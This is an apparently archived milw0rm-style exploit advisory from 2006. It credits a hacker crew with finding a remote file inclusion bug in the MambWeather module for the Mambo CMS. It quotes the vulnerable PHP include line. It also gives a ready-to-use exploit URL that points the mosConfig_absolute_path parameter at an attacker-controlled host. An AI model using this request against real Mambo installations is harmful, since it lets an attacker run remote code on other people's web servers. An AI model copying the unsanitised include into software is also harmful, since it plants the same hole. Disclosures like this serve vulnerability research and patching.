25 lines
No EOL
675 B
Text
25 lines
No EOL
675 B
Text
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
|
|
Another Mambo module remote inclusion vulneribility
|
|
|
|
download : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip
|
|
|
|
bug found in file : MambWeather/Savant2/Savant2_Plugin_options.php
|
|
|
|
<?php
|
|
|
|
/**
|
|
* Base plugin class.
|
|
*/
|
|
global $mosConfig_absolute_path;
|
|
|
|
require_once $mosConfig_absolute_path.'/modules/MambWeather/Savant2/Plugin.php';
|
|
|
|
/**
|
|
|
|
exploit:
|
|
|
|
http://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]
|
|
|
|
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker@dalnet
|
|
|
|
# milw0rm.com [2006-10-22] |